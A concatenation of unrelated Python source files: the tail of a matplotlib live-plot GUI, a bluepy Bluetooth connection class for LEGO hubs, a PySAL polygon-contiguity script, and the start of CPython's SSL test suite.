[sg.Button('Start'), sg.Button('Stop'), sg.Exit()]]
window = sg.Window('Live Plot Matplotlib - FuncAnimation', layout, size=(640, 580),
location=(50, 50), finalize=True, element_justification="center", font="Calibri 18",
resizable=True)
canvas_elem = window['-CANVAS-']
canvas = canvas_elem.TKCanvas
style.use("ggplot")
global ax
f, ax = plt.subplots(figsize=(10, 4.4), dpi=100)
canvas = FigureCanvasTkAgg(f, canvas)
canvas.draw()
canvas.get_tk_widget().pack(side='top', fill='both', expand=1)
global xar
global yar
xar = [1, 2, 3, 4]
yar = [10, 5, 3, 5]
ani = animation.FuncAnimation(f, animate, interval=1000)
while True: # The Event Loop
event, values = window.read()
if event == sg.WIN_CLOSED or event == 'Exit':
break
elif event == "Start":
global thread
thread = True
x = threading.Thread(target=live_plotting, daemon=True)
x.start()
elif event == "Stop":
thread = False
window.close()
def animate(i):
global ax
global xar
global yar
ax.clear()
ax.plot(xar, yar, color='orange')
ax.set_title("Live Plot")
ax.set_xlabel('X-Label', fontsize=10)
ax.set_ylabel('Y-Label', fontsize='medium')
def live_plotting():
global xar
global yar
global thread
while thread:
xar.append(xar[len(xar) - 1] + 1)
yar.append(randint(0, 10))
time.sleep(1)
if __name__ == '__main__':
main()
|
cbluepy.py
|
import logging
import re
from threading import Thread, Event
from bluepy import btle
from pylgbst.comms import Connection
from pylgbst.utilities import str2hex, queue
log = logging.getLogger('comms-bluepy')
COMPLETE_LOCAL_NAME_ADTYPE = 9
PROPAGATE_DISPATCHER_EXCEPTION = False
def _get_iface_number(controller):
"""bluepy uses iface numbers instead of full names."""
if not controller:
return None
m = re.search(r'hci(\d+)$', controller)
if not m:
raise ValueError('Cannot find iface number in {}.'.format(controller))
return int(m.group(1))
class BluepyDelegate(btle.DefaultDelegate):
def __init__(self, handler):
btle.DefaultDelegate.__init__(self)
self._handler = handler
def handleNotification(self, cHandle, data):
log.debug('Incoming notification')
self._handler(cHandle, data)
# We need a separate thread to wait for notifications,
# but calling peripheral's methods from different threads creates issues,
# so we will wrap all the calls into a thread
class BluepyThreadedPeripheral(object):
def __init__(self, addr, addrType, controller):
self._call_queue = queue.Queue()
self._addr = addr
self._addrType = addrType
self._iface_number = _get_iface_number(controller)
self._disconnect_event = Event()
self._dispatcher_thread = Thread(target=self._dispatch_calls)
self._dispatcher_thread.setDaemon(True)
self._dispatcher_thread.setName("Bluepy call dispatcher")
self._dispatcher_thread.start()
def _dispatch_calls(self):
self._peripheral = btle.Peripheral(self._addr, self._addrType, self._iface_number)
try:
while not self._disconnect_event.is_set():
try:
try:
method = self._call_queue.get(False)
method()
except queue.Empty:
pass
self._peripheral.waitForNotifications(1.)
except Exception as ex:
log.exception('Exception in call dispatcher thread', exc_info=ex)
if PROPAGATE_DISPATCHER_EXCEPTION:
log.error("Terminating dispatcher thread.")
raise
finally:
self._peripheral.disconnect()
def write(self, handle, data):
self._call_queue.put(lambda: self._peripheral.writeCharacteristic(handle, data))
def set_notify_handler(self, handler):
delegate = BluepyDelegate(handler)
self._call_queue.put(lambda: self._peripheral.withDelegate(delegate))
def disconnect(self):
self._disconnect_event.set()
class BluepyConnection(Connection):
def __init__(self, controller='hci0'):
Connection.__init__(self)
self._peripheral = None # :type BluepyThreadedPeripheral
self._controller = controller
def connect(self, hub_mac=None):
log.debug("Trying to connect client to MoveHub with MAC: %s", hub_mac)
scanner = btle.Scanner()
while not self._peripheral:
log.info("Discovering devices...")
scanner.scan(1)
devices = scanner.getDevices()
for dev in devices:
address = dev.addr
addressType = dev.addrType
name = dev.getValueText(COMPLETE_LOCAL_NAME_ADTYPE)
if self._is_device_matched(address, name, hub_mac):
self._peripheral = BluepyThreadedPeripheral(address, addressType, self._controller)
break
return self
def disconnect(self):
self._peripheral.disconnect()
def write(self, handle, data):
log.debug("Writing to handle %s: %s", handle, str2hex(data))
self._peripheral.write(handle, data)
def set_notify_handler(self, handler):
self._peripheral.set_notify_handler(handler)
def is_alive(self):
return True
|
numpy_weights_verbose.py
|
#Contiguity using apply_async
import pysal as ps
from collections import defaultdict
import multiprocessing as mp
import time
import sys
import ctypes
import numpy as np
from numpy.random import randint
def check_contiguity(checks,lock,weight_type='ROOK'):
cid = mp.current_process()._name
geoms = np.frombuffer(sgeoms)
geoms.shape = (2,geoms.shape[0] / 2)
offsets = np.frombuffer(soffsets) #This is float, but should be int...
contmatrix = np.frombuffer(scontmatrix)
contmatrix.shape = (len(offsets), len(offsets))
if weight_type == 'ROOK':
for polys in checks:
potential_neigh = polys.tolist()
vertices = {}
for poly in polys:
vstart = 0
vend = offsets[poly]
if poly - 1 > 0:
vstart = offsets[int(poly) - 1]
vertices[poly] = geoms[:,vstart:vend]
for k, v in vertices.iteritems():
potential_neigh.remove(k)
root_geom = v
for neigh in potential_neigh:
test_geom = vertices[neigh]
#If the geoms share a common vertex, we need to test for a common edge.
xintersects = np.intersect1d(root_geom[0], test_geom[0])
if len(xintersects) > 1:
yintersects = np.intersect1d(root_geom[1], test_geom[1])
if len(yintersects) > 1:
#We have two shared points - are they adjacent in the poly geom, i.e. an edge?
x1root = np.where(root_geom[0] == xintersects[0])[0]
x2root = np.where(root_geom[0] == xintersects[1])[0]
if np.absolute(x1root - x2root).any() == 1:
x1test = np.where(test_geom[0] == xintersects[0])[0]
x2test = np.where(test_geom[0] == xintersects[1])[0]
if np.absolute(x1test - x2test).any() == 1:
with lock:
contmatrix[k, neigh] += 1
contmatrix[neigh, k] += 1
def global_pointers(_cgeoms, _coffsets, _contmatrix):
global sgeoms
global soffsets
global scontmatrix
sgeoms = _cgeoms
soffsets = _coffsets
scontmatrix = _contmatrix
if __name__ == "__main__":
if len(sys.argv) > 1:
cores = int(sys.argv[1])
else:
cores = mp.cpu_count()
#print "This version uses apply_async with a callback function and {0} cores.".format(cores)
#fnames = ['1024_lattice.shp', '10000_lattice.shp', '50176_lattice.shp', '100489_lattice.shp', '1000_poly.shp', '10000_poly.shp', '50000_poly.shp', '100000_poly.shp']
fnames = ['2500_poly.shp']
for fname in fnames:
ta = time.time() #Global time keeper
t1 = time.time()
#Phase 1: Bin the shapefile
shpFileObject = ps.open(fname)
t2 = time.time()
print "Reading the shapefile took {} seconds".format(t2-t1)
t1 = time.time()
if shpFileObject.type != ps.cg.Polygon:
break
t2 = time.time()
print "Checking the geometry took {} seconds".format(t2-t1)
t1 = time.time()
shapebox = shpFileObject.bbox # bounding box
numPoly = len(shpFileObject)
t2 = time.time()
print "Getting the BBox and length took {} seconds".format(t2-t1)
t1 = time.time()
t3 = time.time()
ranseq = sorted([randint(0,numPoly) for r in xrange(5)])
geomx = []
geomy = []
bboxes = np.empty((numPoly, 4))
pieces = 0
total_perim = 0
lens = np.empty(numPoly)
t4 = time.time()
for g in xrange(numPoly):
shpobj = shpFileObject.get(g)
x, y = zip(*shpobj.vertices)
geomx += x
geomy += y
lens[g] = shpobj.len
bboxes[g][:] = shpobj.bounding_box[:] #Add 0.3 seconds for 5625 super inefficient!
if g in ranseq:
pieces += lens[g] - 1
total_perim += shpobj.perimeter
cellsize = total_perim / pieces * 1.
cellsize *= 2 #This needs to be tests, is a cell size of l better ot l*c
geoms = np.empty((2, len(geomx)))
geoms[0] = geomx
geoms[1] = geomy
del geomx, geomy
t2 = time.time()
print "***THIS IS ALL READ TIME***"
print "Flattening vertices and cellsize computation required {} seconds".format(t2 - t1)
print " Within this {} seconds were used for allocation".format(t4-t3)
print "***DONE READING***"
print "Processing with a cell size of {} units".format(cellsize)
t1 = time.time()
xdimension = abs(int((shapebox[2] - shapebox[0]) / cellsize))
ydimension = abs(int((shapebox[3] - shapebox[1]) / cellsize))
#Partition the space into a regular grid
xmesh = np.linspace(shapebox[0], shapebox[2], xdimension)
ymesh = np.linspace(shapebox[1], shapebox[3], ydimension)
xv, yv = np.meshgrid(xmesh,ymesh)
memship = np.empty((numPoly, 5), dtype=np.int)
#Intersect the BBoxes with the meshgrid
memship[:,2] = np.searchsorted(yv[:,0], bboxes[:,1], side='left')
memship[:,3] = np.searchsorted(yv[:,0], bboxes[:,3], side='left')
memship[:,0] = np.searchsorted(xv[0], bboxes[:,0], side='left')
memship[:,1] = np.searchsorted(xv[0], bboxes[:,2], side='left')
#Fix floating point inaccuracies, i.e. all the 0s and all the max + 1 values
ystart = memship[:,2]
ystart[ystart == 0] = 1
xstart = memship[:,0]
xstart[xstart == 0] = 1
ystop = memship[:,3]
ystop[ystop == len(yv[:,0] + 1)] = len(yv[:,0])
xstop = memship[:,1]
xstop[xstop == len(xv[0]) + 1] = len(xv[0])
#Add the keys
memship[:,4] = indices = np.arange(len(bboxes))
#Lexicographical sort on xstart, ystart, xend, yend
ind = np.lexsort((memship[:,0], memship[:,2], memship[:,1], memship[:,3]))
sortmem = memship[ind]
t2 = time.time()
print "Getting buckets and generating data structure took {} seconds.".format(t2-t1)
t1 = time.time()
potential_neighbors = {}
#Can this be vectorized or use itertools?
for i in xrange(1, len(xv[0])):
stepback = {} #A list of x and y crossers that we need to deincrement x for
crosseridx = np.where((sortmem[:,0]==i) & (sortmem[:,1]!=sortmem[:,0]))
crosseridy = np.where((sortmem[:,0]==i)\
& (sortmem[:,2]!=sortmem[:,3])\
& (sortmem[:,1]!=sortmem[:,0]))
yrollback = sortmem[crosseridy, 2]
for j in xrange(1, len(yv[:,0])):
#Step over all y cells in the x column
yidx = np.logical_and(sortmem[:,0] == i, sortmem[:,2] == j)
if len(sortmem[yidx, -1]) > 0:
potential_neighbors[(i,j)] = sortmem[yidx, -1]
#Same idea as below, but with all j in this i - using bitwise operators
# should be safe as arrays are all boolean checks.
idx = np.where((sortmem[:,2]==j) & (sortmem[:,2]!=sortmem[:,3]) & (sortmem[:,0]==i))
sortmem[idx,2] = (j + 1)
#We know that all the values are sorted, so if start != end, increment
# start until it start == end. Then the poly is added to all
# row / column pairs between start and end.
sortmem[crosseridx, 0] = (i + 1)
#Rollback the y crossers for the new x.
sortmem[crosseridy,2] = yrollback
t2 = time.time()
print "Extracting vectors to polygon membership lists too {} seconds".format(t2-t1)
t1 = time.time()
#Can I get a vertex count from a shapefile header?
# If so no need for lists to arrays, just allocate and pack.
cgeoms = mp.RawArray(ctypes.c_double, geoms.size)
npgeoms = np.frombuffer(cgeoms)
npgeoms.shape = (2, geoms.shape[1])
npgeoms[:] = geoms
coffsets = mp.RawArray(ctypes.c_int, lens.size * 2)
npoffsets = np.frombuffer(coffsets)
npoffsets[:] = np.cumsum(lens)
contmatrix = mp.RawArray(ctypes.c_int, (lens.size * lens.size * 2))
npcontmatrix = np.frombuffer(contmatrix)
npcontmatrix.shape = (lens.size, lens.size)
npcontmatrix[:] = 0
global_pointers(cgeoms, coffsets, contmatrix)
t2 = time.time()
print "Creating ctype shared memory vertices took {} seconds".format(t2-t1)
'''
t1 = time.time()
cores = mp.cpu_count()
pool = mp.Pool(cores)
t2 = time.time()
print "Initializing the pool of workers took {} seconds".format(t2 - t1)
'''
t1 = time.time()
#We don't care what 'cell' polys are in, only that they
# might be neighbors.
neighbor_checks = [v for v in potential_neighbors.itervalues()]
starts = range(0,len(neighbor_checks), len(neighbor_checks) / cores)
stops = starts[1:]
if len(stops) == 1:
stops.append(len(neighbor_checks))
offsets = [ range(z[0],z[1]) for z in zip(starts, stops)]
t2 = time.time()
print "Computing decomposition took {} seconds".format(t2-t1)
t1 = time.time()
jobs = []
lock = mp.Lock()
for offset in offsets:
checks = [neighbor_checks[j] for j in offset]
job = mp.Process(target=check_contiguity, args=(checks,lock, 'ROOK'))
jobs.append(job)
for job in jobs:
job.start()
for job in jobs:
job.join()
t2 = time.time()
print "Multicore contiguity check took {} seconds".format(t2-t1)
t1 = time.time()
w = {}
nonzero =np.transpose(np.nonzero(npcontmatrix))
for i in range(numPoly):
neigh = nonzero[nonzero[:,0] == i]
w[i] = neigh[:,1].tolist()
t2 = time.time()
print "Generating a W from a sparse matrix took {} seconds".format(t2-t1)
tb = time.time()
print "Total processing time was {} seconds".format(tb-ta)
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
import warnings
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
import asyncore
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
if major >= 3:
# 3.x uses 0xMNN00PP0L
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{patch:d}"
else:
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
